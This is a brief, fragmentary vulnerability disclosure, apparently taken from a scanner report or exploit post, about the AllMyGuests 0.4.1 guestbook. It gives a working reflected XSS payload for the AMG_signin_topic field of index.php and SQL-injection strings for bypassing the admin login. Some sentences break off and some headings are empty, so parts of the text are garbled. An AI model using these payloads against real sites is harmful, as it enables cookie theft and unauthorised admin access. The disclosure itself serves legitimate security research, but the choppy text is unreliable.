php info :
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code
not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens
retained by the browser.
This vulnerability affects /AllMyGuests0.4.1/index.php.
Discovered by: Scripting (XSS.script).
POST (multipart) input AMG_signin_topic was set to 1" onmouseover=prompt(988847) bad="
The input is reflected inside a tag parameter between double quotes.
Insecure Cookie Handling :
Auth Bypass :
Username : azerty' or '1=1--# Real admin name
Password : demo1 ' or ' 1=1 or admin or any thing